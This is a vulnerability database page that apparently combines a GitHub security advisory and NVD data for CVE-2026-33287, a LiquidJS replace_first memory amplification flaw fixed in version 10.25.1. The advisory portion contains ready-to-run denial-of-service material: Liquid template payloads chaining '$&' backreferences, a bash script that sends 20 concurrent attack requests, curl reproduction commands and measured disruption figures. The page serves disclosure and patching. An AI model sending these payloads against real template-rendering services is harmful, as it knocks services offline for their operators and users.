312.5 MB is allocated while only ~6.38 MB is charged to the memory counter.\n\n#### Demonstrated Denial of Service (concurrent attack)\n\nAfter confirming the single-request PoC, launch 20 concurrent attacks + legitimate user requests to measure actual service disruption.\n\n**Raw Liquid template payload sent by attacker:**\n```liquid\n{% assign s = \"A\" %}\n{% assign s = s | replace_first: s, \"$\u0026$\u0026$\u0026...(50 times)...$\u0026\" %}\n{% assign s = s | replace_first: s, \"$\u0026$\u0026$\u0026...(50 times)...$\u0026\" %}\n{% assign s = s | replace_first: s, \"$\u0026$\u0026$\u0026...(50 times)...$\u0026\" %}\n{% assign s = s | replace_first: s, \"$\u0026$\u0026$\u0026...(50 times)...$\u0026\" %}\n{% assign s = s | replace_first: s, \"$\u0026$\u0026$\u0026...(50 times)...$\u0026\" %}\n{{ s }}\n```\n\n\u003e `$\u0026` is a JavaScript `String.prototype.replace()` backreference pattern that inserts the entire matched string. Each stage amplifies 50x \u2192 5 stages = 50^5 = 312,500,000 characters (~312.5MB). `{{ s }}` forces the full output into the HTTP response, keeping memory allocated during transfer and blocking the Node.js event loop.\n\n```bash\n#!/bin/bash\n# DoS demonstration: 20 concurrent attacks + legitimate user latency measurement\n\nDOLLAR=\u0027$\u0026\u0027\nREP50=$(printf \"${DOLLAR}%.0s\" {1..50})\nPAYLOAD=\"{% assign s = \\\"A\\\" %}{% assign s = s | replace_first: s, \\\"${REP50}\\\" %}{% assign s = s | replace_first: s, \\\"${REP50}\\\" %}{% assign s = s | replace_first: s, \\\"${REP50}\\\" %}{% assign s = s | replace_first: s, \\\"${REP50}\\\" %}{% assign s = s | replace_first: s, \\\"${REP50}\\\" %}{{ s }}\"\n\necho \"=== Advisory 2 DoS: 20 concurrent + normal user ===\"\n\n# 20 DoS attack requests (per-request timing)\nfor i in $(seq 1 20); do\n  (\n    t1=$(date +%s%3N)\n    curl -s -o /dev/null --max-time 120 -X POST \"http://\u003capp\u003e/newsletter/preview\" \\\n      -H \"Content-Type: application/x-www-form-urlencoded\" \\\n      --data-urlencode \"template=$PAYLOAD\"\n    t2=$(date +%s%3N)\n    echo \"DoS[$i]: $(( t2 - t1 ))ms\"\n  ) \u0026\ndone\n\n# Legitimate user requests at 0s, 3s, 6s\n(\n  t1=$(date +%s%3N)\n  curl -s -o /dev/null --max-time 60 -X POST \"http://\u003capp\u003e/newsletter/preview\" \\\n    -H \"Content-Type: application/x-www-form-urlencoded\" \\\n    --data-urlencode \"template=\u003ch1\u003eHello\u003c/h1\u003e\"\n  t2=$(date +%s%3N)\n  echo \"Normal[0s]: $(( t2 - t1 ))ms\"\n) \u0026\n\n(\n  sleep 3\n  t1=$(date +%s%3N)\n  curl -s -o /dev/null --max-time 60 -X POST \"http://\u003capp\u003e/newsletter/preview\" \\\n    -H \"Content-Type: application/x-www-form-urlencoded\" \\\n    --data-urlencode \"template=\u003ch1\u003eHello\u003c/h1\u003e\"\n  t2=$(date +%s%3N)\n  echo \"Normal[3s]: $(( t2 - t1 ))ms\"\n) \u0026\n\n(\n  sleep 6\n  t1=$(date +%s%3N)\n  curl -s -o /dev/null --max-time 60 -X POST \"http://\u003capp\u003e/newsletter/preview\" \\\n    -H \"Content-Type: application/x-www-form-urlencoded\" \\\n    --data-urlencode \"template=\u003ch1\u003eHello\u003c/h1\u003e\"\n  t2=$(date +%s%3N)\n  echo \"Normal[6s]: $(( t2 - t1 ))ms\"\n) \u0026\n\nwait\necho \"=== Done ===\"\n```\n\n**Empirical results** (Node.js v20.20.1, LiquidJS 10.24.0):\n```\nNormal[0s]:  13047ms  \u2190 request sent concurrently with attack \u2014 13s delay\nNormal[3s]:  10124ms  \u2190 still blocked 3 seconds later \u2014 10s delay\nNormal[6s]:   7186ms  \u2190 still blocked 6 seconds later \u2014 7s delay\nDoS[1]:      14729ms\nDoS[2-20]:   17747ms ~ 25353ms\n```\n\nWith 20 concurrent requests, legitimate users experience **up to 13-second delays**. Requests sent 6 seconds after the attack began still take 7 seconds, confirming sustained service disruption throughout the ~25-second attack window. Each attack request costs only ~500 bytes.\n\n#### HTTP Reproduction (for applications that accept user templates)\n\n```bash\n# $\u0026 expansion \u2014 should return \"HELLO-HELLO-HELLO\"\ncurl -s -X POST http://\u003capp\u003e/render \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"template\": \"{{ \\\"HELLO\\\" | replace_first: \\\"HELLO\\\", \\\"$\u0026-$\u0026-$\u0026\\\" }}\"}\u0027\n\n# replace is safe \u2014 should return literal \"$\u0026$\u0026$\u0026\"\ncurl -s -X POST http://\u003capp\u003e/render \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"template\": \"{{ \\\"ABCDE\\\" | replace: \\\"ABCDE\\\", \\\"$\u0026$\u0026$\u0026\\\" }}\"}\u0027\n\n# 5-stage 50x amplification \u2014 produces ~312.5MB response\ncurl -s -X POST http://\u003capp\u003e/render \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"template\": \"{% assign s = \\\"A\\\" %}{% assign s = s | replace_first: s, \\\"$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026\\\" %}{% assign s = s | replace_first: s, \\\"$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026\\\" %}{% assign s = s | replace_first: s, \\\"$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026\\\" %}{% assign s = s | replace_first: s, \\\"$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026\\\" %}{% assign s = s | replace_first: s, \\\"$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026\\\" %}{{ s | size }}\"}\u0027\n```\n```bash\n# 20 concurrent DoS attack requests\nfor i in $(seq 1 20); do\n  curl -s -o /dev/null --max-time 120 -X POST \"http://\u003capp\u003e/render\" \\\n    -H \"Content-Type: application/x-www-form-urlencoded\" \\\n    --data-urlencode \u0027template={% assign s = \"A\" %}{% assign s = s | replace_first: s, \"$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026\" %}{% assign s = s | replace_first: s, \"$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026\" %}{% assign s = s | replace_first: s, \"$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026\" %}{% assign s = s | replace_first: s, \"$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026\" %}{% assign s = s | replace_first: s, \"$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026$\u0026\" %}{{ s }}\u0027 \u0026\ndone\n\n# Legitimate user request (concurrent)\ncurl -w \"Normal: %{time_total}s\\n\" -s -o /dev/null --max-time 60 -X POST \"http://\u003capp\u003e/render\" \\\n  -H \"Content-Type: application/x-www-form-urlencoded\" \\\n  --data-urlencode \u0027template=\u003ch1\u003eHello\u003c/h1\u003e\u0027 \u0026\n\nwait\n```\n\nReplace `http://\u003capp\u003e/render` with the actual template rendering endpoint. The payload is pure Liquid syntax and works regardless of the HTTP framework.\n\n### Impact\n- **`memoryLimit` security bypass**: The memory limit is rendered ineffective for templates using `replace_first` with `$\u0026` patterns.\n- **Demonstrated Denial of Service**: A single request allocates 312.5 MB (625 MB heap). Concurrent requests cause **complete service unavailability**. Due to Node.js single-threaded architecture, the event loop is blocked and all legitimate user requests are stalled.\n- **Measured service disruption** (LiquidJS 10.24.0, Node.js v20, empirically verified):\n\n  | Concurrent Attack Requests | Legitimate User Latency | vs. Baseline | Server Blocked |\n  |---------------------------|------------------------|-------------|---------------|\n  | 10 | 3.2s | **640x** | ~11s |\n  | 20 | **10.9s** | **2,180x** | ~29s |\n\n  With 20 concurrent requests, legitimate user requests are **delayed by 10.9 seconds** and the server becomes **completely unresponsive for 29 seconds**. Requests sent 6 seconds after the attack began still took 8 seconds, confirming sustained service disruption throughout the attack window. The attack cost is ~500 bytes per HTTP request.",
  "id": "GHSA-6q5m-63h6-5x4v",
  "modified": "2026-03-30T13:53:32Z",
  "published": "2026-03-25T17:44:23Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/harttle/liquidjs/security/advisories/GHSA-6q5m-63h6-5x4v"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33287"
    },
    {
      "type": "WEB",
      "url": "https://github.com/harttle/liquidjs/commit/35d523026345d80458df24c72e653db78b5d061d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/harttle/liquidjs"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "LiquidJS has Exponential Memory Amplification through its replace_first Filter $\u0026 Pattern"
}

FKIE_CVE-2026-33287

Vulnerability from fkie_nvd - Published: 2026-03-26 01:16 - Updated: 2026-03-30 16:46

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/harttle/liquidjs/commit/35d523026345d80458df24c72e653db78b5d061d	Patch
security-advisories@github.com	https://github.com/harttle/liquidjs/security/advisories/GHSA-6q5m-63h6-5x4v	Exploit, Vendor Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/harttle/liquidjs/security/advisories/GHSA-6q5m-63h6-5x4v	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	liquidjs	liquidjs	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:liquidjs:liquidjs:*:*:*:*:*:node.js:*:*",
              "matchCriteriaId": "7E49E8C9-5FB9-40CA-BE2C-AC2B6553F472",
              "versionEndExcluding": "10.25.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to version 10.25.1, the `replace_first` filter in LiquidJS uses JavaScript\u0027s `String.prototype.replace()` which interprets `$\u0026` as a back reference to the matched substring. The filter only charges `memoryLimit` for the input string length, not the amplified output. An attacker can achieve exponential memory amplification (up to 625,000:1) while staying within the `memoryLimit` budget, leading to denial of service. Version 10.25.1 patches the issue."
    },
    {
      "lang": "es",
      "value": "LiquidJS es un motor de plantillas compatible con Shopify / GitHub Pages en JavaScript puro. Antes de la versi\u00f3n 10.25.1, el filtro \u0027replace_first\u0027 en LiquidJS utiliza \u0027String.prototype.replace()\u0027 de JavaScript, que interpreta \u0027$\u0026amp;\u0027 como una retroreferencia a la subcadena coincidente. El filtro solo carga \u0027memoryLimit\u0027 por la longitud de la cadena de entrada, no por la salida amplificada. Un atacante puede lograr una amplificaci\u00f3n exponencial de la memoria (hasta 625.000:1) mientras se mantiene dentro del presupuesto de \u0027memoryLimit\u0027, lo que lleva a una denegaci\u00f3n de servicio. La versi\u00f3n 10.25.1 corrige el problema."
    }
  ],
  "id": "CVE-2026-33287",
  "lastModified": "2026-03-30T16:46:03.917",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-26T01:16:27.530",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/harttle/liquidjs/commit/35d523026345d80458df24c72e653db78b5d061d"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/harttle/liquidjs/security/advisories/GHSA-6q5m-63h6-5x4v"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/harttle/liquidjs/security/advisories/GHSA-6q5m-63h6-5x4v"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        },
        {
          "lang": "en",
          "value": "CWE-400"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33287 (GCVE-0-2026-33287)

GHSA-6Q5M-63H6-5X4V

Summary

Details

PoC

Demonstrated Denial of Service (concurrent attack)

HTTP Reproduction (for applications that accept user templates)

Impact

FKIE_CVE-2026-33287

Tags

Sightings

Nomenclature